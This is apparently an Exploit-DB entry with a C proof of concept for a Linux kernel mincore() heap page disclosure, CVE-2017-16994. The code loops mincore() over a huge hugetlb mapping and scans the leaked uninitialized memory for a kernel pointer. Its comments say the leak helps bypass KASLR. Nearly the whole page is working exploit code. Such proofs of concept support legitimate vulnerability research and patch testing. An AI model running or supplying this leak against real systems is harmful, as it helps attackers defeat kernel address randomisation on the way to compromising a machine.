Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)

EDB-ID: 44304
Author: anonymous
Published: 2017-12-11
CVE: CVE-2017-16994
Type: Dos
Platform: Linux
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

  * The source is modified from  
* https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
* I try to find out infomation useful from the infoleak
* The kernel address can be easily found out from the uninitialized memory
* leaked from kernel, which can help bypass kaslr
*/

#define _GNU_SOURCE
#include <unistd.h>
#include <sys/mman.h>
#include <err.h>
#include <stdio.h>

int main(void) {
unsigned char buf[getpagesize()/sizeof(unsigned char)];
int right = 1;
unsigned long addr = 0;

/* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)
err(1, "mmap");

while(right){
/* Touch a mishandle with this type mapping */
if (mincore((void*)0x86000000, 0x1000000, buf))
perror("mincore");
for( int n=0; n<getpagesize()/sizeof(unsigned char); n++) {
addr = *(unsigned long*)(&buf[n]);
/* Kernel address space, may need some mask&offset */
if(addr > 0xffffffff00000000){
right = 0;
goto out;
}
}
}
out:
printf("%p\n", addr);
return 0;
}

Related Posts